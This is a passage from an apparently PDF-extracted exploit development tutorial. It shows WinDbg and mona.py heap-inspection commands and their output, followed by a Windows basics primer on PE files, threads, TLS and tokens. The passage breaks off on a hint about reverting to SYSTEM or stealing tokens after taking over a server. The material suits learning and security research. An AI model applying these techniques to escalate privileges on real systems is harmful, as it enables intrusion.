ValidEntry
 
 
 : 0x003d0000 _HEAP_ENTRY
 
 +0x02c NumberOfUnCommittedPages : 0xd0
 
 +0x030 NumberOfUnCommittedRanges : 1
 
 +0x034 SegmentAllocatorBackTraceIndex : 0
 
 +0x036 Reserved
 
 
 : 0
 
 +0x038 UCRSegmentList
 
 
 : _LIST_ENTRY [ 0x2ffff0 
-
 0x2ffff0 ]
 
 +0x0
40 Flags
 
 
 : 0x40000062
 
 +0x044 ForceFlags
 
 
 : 0x40000060
 
 +0x048 CompatibilityFlags : 0
 
 +0x04c EncodeFlagMask
 
 
 : 0x100000
 
 +0x050 Encoding
 
 
 : _HEAP_ENTRY
 
 +0x058 PointerKey
 
 
 : 0x7d37bf2e
 
 +0x05c Interceptor
 
 
 : 0
 
 +0x060 Virt
ualMemoryThreshold : 0xfe00
 
 +0x064 Signature
 
 
 : 0xeeffeeff
 
 +0x068 SegmentReserve
 
 
 : 0x100000
 
 +0x06c SegmentCommit
 
 
 : 0x2000
 
 +0x070 DeCommitFreeBlockThreshold : 0x200
 
 +0x074 DeCommitTotalFreeThreshold : 0x2000
 
 +0x078 TotalFreeSize
 
 
 : 0x1b01
 
 +0x07c MaximumAllocationSize : 0x7ffdefff
 
 +0x080 ProcessHeapsListIndex : 1
 
 +0x082 HeaderValidateLength : 0x138
 
 +0x084 HeaderValidateCopy : (null)
 
 +0x088 NextAvailableTagIndex : 0
 
 +0x08a MaximumTagIndex
 
 : 0
 
 +0x08c TagEntries
 
 
 : (null)
 
 +0x090 
UCRList
 
 
 : _LIST_ENTRY [ 0x2fffe8 
-
 0x2fffe8 ]
 
 +0x098 AlignRound
 
 
 : 0x17
 
 +0x09c AlignMask
 
 
 : 0xfffffff8
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 31 
-
 
 +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY [ 0x2d00a0 
-
 0x2d00a0 ]
 
 +0x0a8 SegmentList
 
 
 : _LIST_ENTRY [ 0x2d0010 
-
 0x2d0010 ]
 
 +
0x0b0 AllocatorBackTraceIndex : 0
 
 +0x0b4 NonDedicatedListLength : 0
 
 +0x0b8 BlocksIndex
 
 
 : 0x002d0150 Void
 
 +0x0bc UCRIndex
 
 
 : 0x002d0590 Void
 
 +0x0c0 PseudoTagEntries : (null)
 
 +0x0c4 FreeLists
 
 
 : _LIST_ENTRY [ 0x2f0a60 
-
 0x2f28a0 ]
 
 +0x
0cc LockVariable
 
 
 : 0x002d0138 _HEAP_LOCK
 
 +0x0d0 CommitRoutine
 
 
 : 0x7d37bf2e
 
 
 long
 
 +7d37bf2e
 
 +0x0d4 FrontEndHeap
 
 
 : (null)
 
 +0x0d8 FrontHeapLockCount : 0
 
 +0x0da FrontEndHeapType : 0 ''
 
 +0x0dc Counters
 
 
 : _HEAP_COUNTERS
 
 +0x130 Tuning
Parameters : _HEAP_TUNING_PARAMETERS
 
We can get useful information by using 
mona.py
. Let’s start with some general information:
 
0:003> !py mona heap
 
Hold on...
 
[+] Command used:
 
!py mona.py heap
 
Peb : 0x7efde000, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x0
05a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding key: 0x21f9a301
 
0x00330000 (1 segment(s) : 0x00330000)
 
 
 Encoding key: 0x1913b812
 
0x001d0000 (2 segment(s) : 0
x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) : 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
0x02c50000 (1 segment(s) : 0x02c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x02b10000,0x04450000)
 
 
 Encoding key: 0x757121c
e
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 32 
-
 
Please specify a valid searchtype 
-
t
 
Valid values are :
 
 
 lal
 
 
 lfh
 
 
 all
 
 
 segments
 
 
 chunks
 
 
 layout
 
 
 fea
 
 
 bea
 
 
[+] This mona.py action took 0:00:00.012000
 
As we can see there are 7 heaps and 
mona
 also shows the 
segments
 for each heap.
 
We ca
n also use
 !heap
:
 
0:003> !heap 
-
m
 
 Index
 
 
 Address
 
 Name
 
 
 Debugging options enabled
 
 1:
 
 
 005a0000
 
 Segment at 005a0000 to 006a0000 (0005f000 bytes committed)
 
 2:
 
 
 00170000
 
 Segment at 00170000 to 00180000 (00010000 bytes committed)
 
 Segment at 045a00
00 to 046a0000 (0000b000 bytes committed)
 
 3:
 
 
 00330000
 
 Segment at 00330000 to 00370000 (00006000 bytes committed)
 
 4:
 
 
 001d0000
 
 Segment at 001d0000 to 001e0000 (0000b000 bytes committed)
 
 Segment at 006a0000 to 007a0000 (0002e000 bytes committed)
 
 5:
 
 
 020c0000
 
 Segment at 020c0000 to 02100000 (00001000 bytes committed)
 
 6:
 
 
 02c50000
 
 Segment at 02c50000 to 02c90000 (00025000 bytes committed)
 
 7:
 
 
 02b10000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 33 
-
 
 Segment at 02b10000 to 02b20000 (0000e000 bytes committed)
 
 Segment at 04450000 to 04550000 (0
0033000 bytes committed)
 
The option “
-
m
” shows also the segments.
 
To see the segments for a specific heap (0x5a0000), we can use:
 
0:003> !py mona heap 
-
h 5a0000 
-
t segments
 
Hold on...
 
[+] Command used:
 
!py mona.py heap 
-
h 5a0000 
-
t segments
 
Peb : 0x7efde00
0, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x005a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding key: 0x21f9a301
 
0x00330000 (1 segment(s) : 0x00330000)
 
 
 Encodin
g key: 0x1913b812
 
0x001d0000 (2 segment(s) : 0x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) : 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
0x02c50000 (1 segment(s) : 0x02c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x
02b10000,0x04450000)
 
 
 Encoding key: 0x757121ce
 
 
[+] Processing heap 0x005a0000
 
Segment List for heap 0x005a0000:
 
---------------------------------
 
Segment 0x005a0588 
-
 0x006a0000 (FirstEntry: 0x005a0588 
-
 LastValidEntry: 0x006a0000): 0x000ffa78 bytes
 
 
[+
] This mona.py action took 0:00:00.014000
 
Note that 
mona
 shows a summary of all the heaps followed by the specific information we asked. We can 
also omit “
-
h 5a0000
” to get a list of the 
segments
 of all the heaps:
 
0:003> !py mona heap 
-
t segments
 
Hold on..
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 34 
-
 
[+] Command used:
 
!py mona.py heap 
-
t segments
 
Peb : 0x7efde000, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x005a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding 
key: 0x21f9a301
 
0x00330000 (1 segment(s) : 0x00330000)
 
 
 Encoding key: 0x1913b812
 
0x001d0000 (2 segment(s) : 0x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) : 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
0x02c50000 (1 segment(s) : 0x02
c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x02b10000,0x04450000)
 
 
 Encoding key: 0x757121ce
 
 
[+] Processing heap 0x005a0000
 
Segment List for heap 0x005a0000:
 
---------------------------------
 
Segment 0x005a0588 
-
 0x006a0000 (FirstEntry
: 0x005a0588 
-
 LastValidEntry: 0x006a0000): 0x000ffa78 bytes
 
 
[+] Processing heap 0x00170000
 
Segment List for heap 0x00170000:
 
---------------------------------
 
Segment 0x00170588 
-
 0x00180000 (FirstEntry: 0x00170588 
-
 LastValidEntry: 0x00180000): 0x0000fa
78 bytes
 
Segment 0x045a0000 
-
 0x046a0000 (FirstEntry: 0x045a0040 
-
 LastValidEntry: 0x046a0000): 0x00100000 bytes
 
 
[+] Processing heap 0x00330000
 
Segment List for heap 0x00330000:
 
---------------------------------
 
Segment 0x00330588 
-
 0x00370000 (FirstEntry
: 0x00330588 
-
 LastValidEntry: 0x00370000): 0x0003fa78 bytes
 
 
[+] Processing heap 0x001d0000
 
Segment List for heap 0x001d0000:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 35 
-
 
---------------------------------
 
Segment 0x001d0588 
-
 0x001e0000 (FirstEntry: 0x001d0588 
-
 LastValidEntry: 0x001e0000): 0x0000fa
78 bytes
 
Segment 0x006a0000 
-
 0x007a0000 (FirstEntry: 0x006a0040 
-
 LastValidEntry: 0x007a0000): 0x00100000 bytes
 
 
[+] Processing heap 0x020c0000
 
Segment List for heap 0x020c0000:
 
---------------------------------
 
Segment 0x020c0588 
-
 0x02100000 (FirstEntry
: 0x020c0588 
-
 LastValidEntry: 0x02100000): 0x0003fa78 bytes
 
 
[+] Processing heap 0x02c50000
 
Segment List for heap 0x02c50000:
 
---------------------------------
 
Segment 0x02c50588 
-
 0x02c90000 (FirstEntry: 0x02c50588 
-
 LastValidEntry: 0x02c90000): 0x0003fa
78 bytes
 
 
[+] Processing heap 0x02b10000
 
Segment List for heap 0x02b10000:
 
---------------------------------
 
Segment 0x02b10588 
-
 0x02b20000 (FirstEntry: 0x02b10588 
-
 LastValidEntry: 0x02b20000): 0x0000fa78 bytes
 
Segment 0x04450000 
-
 0x04550000 (FirstEntry
: 0x04450040 
-
 LastValidEntry: 0x04550000): 0x00100000 bytes
 
 
[+] This mona.py action took 0:00:00.017000
 
mona.py
 calls the allocated block of memory 
chunks
. To see the 
chunks
 in the segments for a heap use:
 
0:003> !py mona heap 
-
h 5a0000 
-
t chunks
 
Hold on
...
 
[+] Command used:
 
!py mona.py heap 
-
h 5a0000 
-
t chunks
 
Peb : 0x7efde000, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x005a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding key: 0x21f9a301
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 36 
-
 
0x00330000 (1 segment(s) : 0x00330000)
 
 
 Encoding key: 0x1913b812
 
0x001d0000 (2 segment(s) : 0x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) : 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
0x02c50000 (1 segment
(s) : 0x02c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x02b10000,0x04450000)
 
 
 Encoding key: 0x757121ce
 
 
[+] Preparing output file 'heapchunks.txt'
 
 
-
 (Re)setting logfile heapchunks.txt
 
[+] Generating module info table, hang on...
 
 
-
 Processing modules
 
 
-
 Done. Let's rock 'n roll.
 
 
[+] Processing heap 0x005a0000
 
Segment List for heap 0x005a0000:
 
---------------------------------
 
Segment 0x005a0588 
-
 0x006a0000 (FirstEntry: 0x005a0588 
-
 LastValidEntry: 0x006a0000): 0x000ffa78 bytes
 
 
 Nr of chunks : 2237 
 
 
 _HEAP_ENTRY
 
 psize
 
 
 size
 
 unused
 
 UserPtr
 
 
 UserSize
 
 
 005a0588
 
 00000
 
 00250
 
 
 00001
 
 005a0590
 
 0000024f (591) (Fill pattern,Extra present,Busy) 
 
 
 005a07d8
 
 00250
 
 00030
 
 
 00018
 
 005a07e0
 
 00000018 (24) (Fill patt
ern,Extra present,Busy) 
 
 
 005a0808
 
 00030
 
 00bb8
 
 
 0001a
 
 005a0810
 
 00000b9e (2974) (Fill pattern,Extra present,Busy) 
 
 
 005a13c0
 
 00bb8
 
 01378
 
 
 0001c
 
 005a13c8
 
 0000135c (4956) (Fill pattern,Extra present,Busy) 
 
 
 005a2738
 
 01378
 
 00058
 
 
 0001c
 
 005a2740
 
 0000003c (60) (Fill pattern,Extra present,Busy) 
 
 
 005a2790
 
 00058
 
 00048
 
 
 00018
 
 005a2798
 
 00000030 (48) (Fill pattern,Extra present,Busy) 
 
 
 005a27d8
 
 00048
 
 00090
 
 
 00018
 
 005a27e0
 
 00000078 (120) (Fill pattern,Extra present
,Busy) 
 
 
 005a2868
 
 00090
 
 00090
 
 
 00018
 
 005a2870
 
 00000078 (120) (Fill pattern,Extra present,Busy) 
 
 
 005a28f8
 
 00090
 
 00058
 
 
 0001c
 
 005a2900
 
 0000003c (60) (Fill pattern,Extra present,Busy) 
 
 
 005a2950
 
 00058
 
 00238
 
 
 00018
 
 005a2958
 
 00
000220 (544) (Fill pattern,Extra present,Busy) 
 
 
 005a2b88
 
 00238
 
 00060
 
 
 0001e
 
 005a2b90
 
 00000042 (66) (Fill pattern,Extra present,Busy) 
 
 
<snip>
 
 
 005ec530
 
 00038
 
 00048
 
 
 0001c
 
 005ec538
 
 0000002c (44) (Fill pattern,Extra present,Busy)
 
 
 005ec578
 
 00048
 
 12a68
 
 
 00000
 
 005ec580
 
 00012a68 (76392) (Fill pattern) 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 37 
-
 
 
005fefe0
 
 12a68
 
 00020
 
 
 00003
 
 005fefe8
 
 0000001d (29) (Busy) 
 
 
0x005feff8 
-
 0x006a0000 (end of segment) : 0xa1008 (659464) uncommitted bytes
 
 
Heap : 0x005a00
00 : VirtualAllocdBlocks : 0 
 
 
 Nr of chunks : 0 
 
 
[+] This mona.py action took 0:00:02.804000
 
You can also use 
!heap
:
 
0:003> !heap 
-
h 5a0000
 
Index
 
 
 Address
 
 Name
 
 
 Debugging options enabled
 
1:
 
 
 005a0000
 
Segment at 005a0000 to 006a0000 (0005f000 byt
es committed)
 
Flags:
 
 
 40000062
 
ForceFlags:
 
 
 40000060
 
Granularity:
 
 
 8 bytes
 
Segment Reserve:
 
 
 00100000
 
Segment Commit:
 
 
 00002000
 
DeCommit Block Thres: 00000200
 
DeCommit Total Thres: 00002000
 
Total Free Size:
 
 
 0000
2578
 
Max. Allocation Size: 7ffdefff
 
Lock Variable at:
 
 
 005a0138
 
Next TagIndex:
 
 
 0000
 
Maximum TagIndex:
 
 
 0000
 
Tag Entries:
 
 
 00000000
 
PsuedoTag Entries:
 
 
 00000000
 
Virtual Alloc List:
 
 
 005a00a0
 
Uncommitted ranges:
 
 
 005a0090
 
FreeList[ 0
0 ] at 005a00c4: 005ec580 . 005e4f28
 
 
 (18 blocks)
 
 
Heap entries for Segment00 in Heap 005a0000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 38 
-
 
address: psize . size
 
 flags
 
 
 state (requested size)
 
005a0000: 00000 . 00588 [101] 
-
 busy (587)
 
005a0588: 00588 . 00250 [107] 
-
 busy (24f), tail fill
 
005a07d8:
 00250 . 00030 [107] 
-
 busy (18), tail fill
 
005a0808: 00030 . 00bb8 [107] 
-
 busy (b9e), tail fill
 
005a13c0: 00bb8 . 01378 [107] 
-
 busy (135c), tail fill
 
005a2738: 01378 . 00058 [107] 
-
 busy (3c), tail fill
 
005a2790: 00058 . 00048 [107] 
-
 busy (30), tail fi
ll
 
005a27d8: 00048 . 00090 [107] 
-
 busy (78), tail fill
 
005a2868: 00090 . 00090 [107] 
-
 busy (78), tail fill
 
005a28f8: 00090 . 00058 [107] 
-
 busy (3c), tail fill
 
005a2950: 00058 . 00238 [107] 
-
 busy (220), tail fill
 
005a2b88: 00238 . 00060 [107] 
-
 busy (42
), tail fill
 
<snip>
 
005ec530: 00038 . 00048 [107] 
-
 busy (2c), tail fill
 
005ec578: 00048 . 12a68 [104] free fill
 
005fefe0: 12a68 . 00020 [111] 
-
 busy (1d)
 
005ff000:
 
 
 000a1000
 
 
-
 uncommitted bytes.
 
To display some statistics, add the option “
-
stat
“:
 
0:003> !py mona heap 
-
h 5a0000 
-
t chunks 
-
stat
 
Hold on...
 
[+] Command used:
 
!py mona.py heap 
-
h 5a0000 
-
t chunks 
-
stat
 
Peb : 0x7efde000, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x005a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0
x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding key: 0x21f9a301
 
0x00330000 (1 segment(s) : 0x00330000)
 
 
 Encoding key: 0x1913b812
 
0x001d0000 (2 segment(s) : 0x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) :
 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 39 
-
 
0x02c50000 (1 segment(s) : 0x02c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x02b10000,0x04450000)
 
 
 Encoding key: 0x757121ce
 
 
[+] Preparing output file 'heapchunks.txt'
 
 
-
 (Re)setting logfile hea
pchunks.txt
 
[+] Generating module info table, hang on...
 
 
-
 Processing modules
 
 
-
 Done. Let's rock 'n roll.
 
 
[+] Processing heap 0x005a0000
 
Segment List for heap 0x005a0000:
 
---------------------------------
 
Segment 0x005a0588 
-
 0x006a0000 (FirstEntr
y: 0x005a0588 
-
 LastValidEntry: 0x006a0000): 0x000ffa78 bytes
 
 
 Nr of chunks : 2237 
 
 
 _HEAP_ENTRY
 
 psize
 
 
 size
 
 unused
 
 UserPtr
 
 
 UserSize
 
 
 Segment Statistics:
 
 
 Size : 0x12a68 (76392) : 1 chunks (0.04 %)
 
 
 Size : 0x3980 (14720) : 1 chunks (0.
04 %)
 
 
 Size : 0x135c (4956) : 1 chunks (0.04 %)
 
 
 Size : 0x11f8 (4600) : 1 chunks (0.04 %)
 
 
 Size : 0xb9e (2974) : 1 chunks (0.04 %)
 
 
 Size : 0xa28 (2600) : 1 chunks (0.04 %)
 
 
<snip>
 
 
 Size : 0x6 (6) : 1 chunks (0.04 %)
 
 
 Size : 0x4 (4) : 1
5 chunks (0.67 %)
 
 
 Size : 0x1 (1) : 1 chunks (0.04 %)
 
 
 Total chunks : 2237
 
 
Heap : 0x005a0000 : VirtualAllocdBlocks : 0 
 
 
 Nr of chunks : 0 
 
Global statistics
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 40 
-
 
 
 Size : 0x12a68 (76392) : 1 chunks (0.04 %)
 
 
 Size : 0x3980 (14720) : 1 chunks (0.04 %)
 
 
 Size : 0x135c (4956) : 1 chunks (0.04 %)
 
 
 Size : 0x11f8 (4600) : 1 chunks (0.04 %)
 
 
 Size : 0xb9e (2974) : 1 chunks (0.04 %)
 
 
 Size : 0xa28 (2600) : 1 chunks (0.04 %)
 
 
<snip>
 
 
 Size : 0x6 (6) : 1 chunks (0.04 %)
 
 
 Size : 0x4 (4) : 15 chunks (0.67 %)
 
 
 Size : 0x1 (1) : 1 chunks (0.04 %)
 
 
 Total chunks : 2237
 
 
[+] This mona.py action took 0:00:02.415000
 
mona.py
 is able to discover 
strings
, 
BSTRING
s and 
vtable objects
 in the blocks/chunks of the 
segments
. To 
see this information, use “
-
t layout
“. This fun
ction writes the data to the file 
heaplayout.txt
.
 
You can use the following additional options:
 

 
-
v
: write the data also in the log window
 

 
-
fast
: skip the discovery of object sizes
 

 
-
size <sz>
: skip strings that are smaller than 
<sz>
 

 
-
after <val>
: ignore ent
ries inside a chunk until either a 
string
 or 
vtable
 reference is found that 
contains the value 
<val>
; then, output everything for the current chunk.
 
Example:
 
0:003> !py mona heap 
-
h 5a0000 
-
t layout 
-
v
 
Hold on...
 
[+] Command used:
 
!py mona.py heap 
-
h 5a000
0 
-
t layout 
-
v
 
Peb : 0x7efde000, NtGlobalFlag : 0x00000070
 
Heaps:
 
------
 
0x005a0000 (1 segment(s) : 0x005a0000) * Default process heap
 
 Encoding key: 0x171f4fc1
 
0x00170000 (2 segment(s) : 0x00170000,0x045a0000)
 
 
 Encoding key: 0x21f9a301
 
0x00330000 (1 segm
ent(s) : 0x00330000)
 
 
 Encoding key: 0x1913b812
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 41 
-
 
0x001d0000 (2 segment(s) : 0x001d0000,0x006a0000)
 
 
 Encoding key: 0x547202aa
 
0x020c0000 (1 segment(s) : 0x020c0000)
 
 
 Encoding key: 0x0896f86d
 
0x02c50000 (1 segment(s) : 0x02c50000)
 
 
 Encoding key: 0x21f9a301
 
0x02b10000 (2 segment(s) : 0x02b10000,0x04450000)
 
 
 Encoding key: 0x757121ce
 
 
[+] Preparing output file 'heaplayout.txt'
 
 
-
 (Re)setting logfile heaplayout.txt
 
[+] Generating module info table, hang on...
 
 
-
 Processing modules
 
 
-
 Done. Let's rock 
'n roll.
 
 
[+] Processing heap 0x005a0000
 
-----
 Heap 0x005a0000, Segment 0x005a0588 
-
 0x006a0000 (1/1) 
-----
 
Chunk 0x005a0588 (Usersize 0x24f, ChunkSize 0x250) : Fill pattern,Extra present,Busy
 
Chunk 0x005a07d8 (Usersize 0x18, ChunkSize 0x30) : Fill pattern
,Extra present,Busy
 
Chunk 0x005a0808 (Usersize 0xb9e, ChunkSize 0xbb8) : Fill pattern,Extra present,Busy
 
 
 +03a3 @ 005a0bab
-
>005a0d73 : Unicode (0x1c6/454 bytes, 0xe3/227 chars) : Path=C:
\
Program Files (x86)
\
Windows Kits
\
8.1
\
Debuggers
\
x86
\
winext
\
arcade;C:
\
Program Files (x86)
\
NVID...
 
 
 +00ec @ 005a0e5f
-
>005a0eef : Unicode (0x8e/142 bytes, 0x47/71 chars) : PROCESSOR_IDENTIFIER=Intel64 Family 6 
Model 60 Stepping 3, GenuineIntel
 
 
 +0160 @ 005a104f
-
>005a10d1 : Unicode (0x80/128 bytes, 0x40/64 chars) : PSModulePa
th=C:
\
Windows
\
system32
\
Windo
wsPowerShell
\
v1.0
\
Modules
\
 
 
 +0234 @ 005a1305
-
>005a1387 : Unicode (0x80/128 bytes, 0x40/64 chars) : WINDBG_DIR=C:
\
Program Files (x86)
\
Windo
ws Kits
\
8.1
\
Debuggers
\
x86
 
Chunk 0x005a13c0 (Usersize 0x135c, ChunkSize 0x1378) : Fill pat
tern,Extra present,Busy
 
 
 +04a7 @ 005a1867
-
>005a1ab5 : Unicode (0x24c/588 bytes, 0x126/294 chars) : C:
\
Windows
\
System32;;C:
\
Windows
\
syste
m32;C:
\
Windows
\
system;C:
\
Windows;.;C:
\
Program Files (x86)
\
Windo...
 
 
 +046c @ 005a1f21
-
>005a20e9 : Unicode (0x1c6/454 by
tes, 0xe3/227 chars) : Path=C:
\
Program Files (x86)
\
Windows Kits
\
8.1
\
Debuggers
\
x86
\
winext
\
arcade;C:
\
Program Files (x86)
\
NVID...
 
 
 +00ec @ 005a21d5
-
>005a2265 : Unicode (0x8e/142 bytes, 0x47/71 chars) : PROCESSOR_IDENTIFIER=Intel64 Family 6
 Model 60 Stepping 
3, GenuineIntel
 
 
 +0160 @ 005a23c5
-
>005a2447 : Unicode (0x80/128 bytes, 0x40/64 chars) : PSModulePath=C:
\
Windows
\
system32
\
Windo
wsPowerShell
\
v1.0
\
Modules
\
 
 
 +0234 @ 005a267b
-
>005a26fd : Unicode (0x80/128 bytes, 0x40/64 chars) : WINDBG_DIR=C:
\
Program Files (
x86)
\
Windo
ws Kits
\
8.1
\
Debuggers
\
x86
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 42 
-
 
Chunk 0x005a2738 (Usersize 0x3c, ChunkSize 0x58) : Fill pattern,Extra present,Busy
 
Chunk 0x005a2790 (Usersize 0x30, ChunkSize 0x48) : Fill pattern,Extra present,Busy
 
<snip>
 
Chunk 0x005ec4b0 (Usersize 0x30, ChunkSize 0x48
) : Fill pattern,Extra present,Busy
 
Chunk 0x005ec4f8 (Usersize 0x20, ChunkSize 0x38) : Fill pattern,Extra present,Busy
 
Chunk 0x005ec530 (Usersize 0x2c, ChunkSize 0x48) : Fill pattern,Extra present,Busy
 
Chunk 0x005ec578 (Usersize 0x12a68, ChunkSize 0x12a68)
 : Fill pattern
 
Chunk 0x005fefe0 (Usersize 0x1d, ChunkSize 0x20) : Busy
 
Consider the following two lines extracted from the output above:
 
Chunk 0x005a0808 (Usersize 0xb9e, ChunkSize 0xbb8) : Fill pattern,Extra present,Busy
 
 +03a3 @ 005a0bab
-
>005a0d73 : Uni
code (0x1c6/454 bytes, 0xe3/227 chars) : Path=C:
\
Program Files (x86)
\
Windows Kits
\
8.1
\
Debuggers
\
x86
\
winext
\
arcade;C:
\
Program Files (x86)
\
NVID...
 
The second line tells us that:
 
1
.
 
the entry is at 3a3 bytes from the beginning of the 
chunk
;
 
2
.
 
the entry goes from 5
a0bab to 5a0d73;
 
3
.
 
the entry is a 
Unicode string
 of 454 bytes or 227 chars;
 
4
.
 
the string is “
Path=C:
\
Program Files (x86)
\
Windows Kits
\
...
” (snipped).
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 43 
-
 
Windows Basics
 
 
This is a very brief article about some facts that should be common knowledge to Windows developers, but 
that Linux developers might not know.
 
Win32 API
 
The main 
API
 of Windows is provided through se
veral 
DLL
s (
D
ynamic 
L
ink
 L
ibraries). An application can 
import functions from those 
DLL
 and call them. This way, the internal 
API
s of the 
Kernel
 can change from a 
version to the next without compromising the portability of normal 
user mode
 applications.
 
PE
 file format
 
Executables
 and 
DLL
s are 
PE
 (
P
ortable 
E
xecutable) files. Each 
PE
 includes an 
import
 and an 
export table
. 
The 
import table
 specifies the functions to import and in which files they are located. The 
export table
 
specifies the 
exported functions
,
 i.e. the functions that can be imported by other 
PE
 files.
 
PE
 files are composed of various 
sections
 (for code, data, etc...). The 
.reloc
 section contains information to 
relocate the 
executable
 or 
DLL
 in memory. While some addresses in code are relative (li
ke for the relative 
jmps), many are absolute and depends on where the 
module
 is loaded in memory.
 
The
 Windows loader
 searches for 
DLL
s starting with the current 
working directory
, so it is possible to 
distribute an application with a 
DLL
 different from the
 one in the system root (
\
windows
\
system32
). This 
versioning issue is called 
DLL
-
hell
 by some people.
 
One important concept is that of a 
RVA
 (
R
elative 
V
irtual 
A
ddress). 
PE
 files use 
RVA
s to specify the position 
of elements relative the 
base address
 of the 
module
. In other words, if a 
module
 is loaded at an address 
B
 
and an element has an 
RVA
 
X
, then the element’s absolute address in memory is simply 
B+X
.
 
Threading
 
If you’re used to Windows, there’s nothing strange about the concept of 
threads
, but if you co
me form Linux, 
keep in mind that Windows gives 
CPU
-
time slices
 to 
threads
 rather than to 
processes
 like Linux. Moreover, 
there is no 
fork()
 function. You can create new 
processes
 with 
CreateProcess()
 and new 
threads
 with 
CreateThreads()
. 
Threads
 execute wi
thin the 
address space
 of the 
process
 they belong to, so they share 
memory.
 
Threads
 also have limited support for non
-
shared memory through a mechanism called 
TLS
 (
T
hread 
L
ocal 
Storage). Basically, the 
TEB
 of each thread contains a main 
TLS
 array of 64 DWO
RDS and an optional 
TLS
 
array of maximum 1024 DWORDS which is allocated when the main 
TLS
 array runs out of available 
DWORDs. First, an index, corresponding to a position in one of the two arrays, must be allocated or 
reserved with 
TlsAlloc()
, which return
s the index allocated. Then, each 
thread
 can access the DWORD in 
one of its own two 
TLS
 arrays at the index allocated. The DWORD can be read with 
TlsGetValue(index)
 and 
written to with 
TlsSetValue(index, newValue)
.
 
As an example, 
TlsGetValue(7)
 reads the D
WORD at index 7 from the main 
TLS
 array in the 
TEB
 of the 
current 
thread
.
 
Note that we could emulate this mechanism by using 
GetCurrentThreadId()
, but it wouldn’t be as efficient.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 44 
-
 
Tokens and Impersonation
 
Tokens
 are representations of 
access rights
. 
Tokens
 are implemented as 32
-
bit integers, much like 
file 
handles
. Each 
process
 maintains an internal structure which contains information about the 
access rights
 
associated with the 
tokens
.
 
There are two types of tokens: 
primary tokens
 and 
secondary tokens
. Whe
never a 
process
 is created, it is 
assigned a 
primary token
. Each 
thread
 of that 
process
 can have the 
token
 of the 
process
 or a 
secondary 
token
 obtained from another 
process
 or the 
LoginUser()
 function which returns a new 
token
 if called with 
correct 
creden
tials
.
 
To attach a 
token
 to the current 
thread
 you can use 
SetThreadToken(newToken)
 and remove it with 
RevertToSelf()
 which makes the 
thread
 revert to 
primary token
.
 
Let’s say a user connects to a server in Windows and send 
username
 and 
password
. The serve
r, running as 
SYSTEM
, will call 
LogonUser()
 with the provided 
credentials
 and if they are correct a new 
token
 is returned. 
Then the server creates a new 
thread
 and that 
thread
 calls 
SetThreadToken(new_token)
 where 
new_token
 
is the 
token
 previously returned
 by 
LogonUser()
. This way, the 
thread
 executes with the same privileges of 
the user. When the 
thread
 is finished serving the client, either it is destroyed, or it calls 
revertToSelf()
 and is 
added to the 
pool of free threads
.
 
If you can take control of a s
erver, you can revert to 
SYSTEM
 by calling 
RevertToSelf()
 or look for other 
tokens
 in memory and attach them to the current 
thread
 with
